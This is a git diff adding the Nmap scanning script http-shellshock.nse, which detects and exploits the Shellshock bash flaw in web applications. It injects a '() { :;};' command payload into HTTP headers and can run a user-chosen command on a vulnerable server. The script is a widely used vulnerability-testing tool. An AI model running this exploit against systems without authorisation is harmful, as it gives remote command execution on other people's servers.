diff options
Diffstat (limited to 'scripts/http-shellshock.nse')
| -rw-r--r-- | scripts/http-shellshock.nse | 144 |
1 files changed, 144 insertions, 0 deletions
diff --git a/scripts/http-shellshock.nse b/scripts/http-shellshock.nse new file mode 100644 index 0000000..d04f6d4 --- /dev/null +++ b/scripts/http-shellshock.nse @@ -0,0 +1,144 @@ +local http = require "http" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local vulns = require "vulns" +local rand = require "rand" + +description = [[ +Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and +CVE-2014-7169) in web applications. + +To detect this vulnerability the script executes a command that prints a random +string and then attempts to find it inside the response body. Web apps that +don't print back information won't be detected with this method. + +By default the script injects the payload in the HTTP headers User-Agent, +Cookie, and Referer. + +Vulnerability originally discovered by Stephane Chazelas. + +References: +* http://www.openwall.com/lists/oss-security/2014/09/24/10 +* http://seclists.org/oss-sec/2014/q3/685 +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 +* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 +]] + +--- +-- @usage +-- nmap -sV -p- --script http-shellshock <target> +-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target> +-- @output +-- PORT STATE SERVICE REASON +-- 80/tcp open http syn-ack +-- | http-shellshock: +-- | VULNERABLE: +-- | HTTP Shellshock vulnerability +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:CVE-2014-6271 +-- | This web application might be affected by the vulnerability known as Shellshock. It seems the server +-- | is executing commands injected via malicious HTTP headers. +-- | +-- | Disclosure date: 2014-09-24 +-- | References: +-- | http://www.openwall.com/lists/oss-security/2014/09/24/10 +-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 +-- | http://seclists.org/oss-sec/2014/q3/685 +-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 +-- +-- @xmloutput +-- <elem key="title">HTTP Shellshock vulnerability</elem> +-- <elem key="state">VULNERABLE (Exploitable)</elem> +-- <table key="ids"> +-- <elem>CVE:CVE-2014-6271</elem> +-- </table> +-- <table key="description"> +-- <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server +-- 
is executing commands injected via malicious HTTP headers. 
 </elem> +-- </table> +-- <table key="dates"> +-- <table key="disclosure"> +-- <elem key="year">2014</elem> +-- <elem key="day">24</elem> +-- <elem key="month">09</elem> +-- </table> +-- </table> +-- <elem key="disclosure">2014-09-24</elem> +-- <table key="refs"> +-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem> +-- <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem> +-- <elem>http://seclists.org/oss-sec/2014/q3/685</elem> +-- <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem> +-- </table> +-- @args http-shellshock.uri URI. Default: / +-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent +-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil +--- +author = {"Paulino Calderon <calderon()websec.mx","Paul Amar <paul()sensepost com>"} +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"exploit","vuln","intrusive"} + +portrule = shortport.http + +function generate_http_req(host, port, uri, custom_header, cmd) + local rnd = nil + --Set custom or probe with random string as cmd + if not cmd then + local rnd1 = rand.random_alpha(7) + local rnd2 = rand.random_alpha(7) + rnd = rnd1 .. rnd2 + cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2) + end + cmd = "() { :;}; " .. cmd + -- Plant the payload in the HTTP headers + local options = {header={}} + options["no_cache"] = true + if custom_header == nil then + stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd) + options["header"]["User-Agent"] = cmd + options["header"]["Referer"] = cmd + options["header"]["Cookie"] = cmd + else + stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header) + options["header"][custom_header] = cmd + end + local req = http.get(host, port, uri, options) + + return req, rnd +end + +action = function(host, port) + local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil + local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or nil + local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/' + local req, rnd = generate_http_req(host, port, uri, http_header, nil) + if req.status == 200 and req.body:find(rnd, 1, true) then + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local vuln = { + title = 'HTTP Shellshock vulnerability', + state = vulns.STATE.NOT_VULN, + description = [[ +This web application might be affected by the vulnerability known +as Shellshock. It seems the server is executing commands injected +via malicious HTTP headers. + ]], + IDS = {CVE = 'CVE-2014-6271'}, + references = { + 'http://www.openwall.com/lists/oss-security/2014/09/24/10', + 'http://seclists.org/oss-sec/2014/q3/685', + 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169' + }, + dates = { + disclosure = {year = '2014', month = '09', day = '24'}, + }, + } + stdnse.debug1("Random pattern '%s' was found in page. Host seems vulnerable.", rnd) + vuln.state = vulns.STATE.EXPLOIT + if cmd ~= nil then + req = generate_http_req(host, port, uri, http_header, cmd) + vuln.exploit_results = req.body + end + return vuln_report:make_output(vuln) + end +end |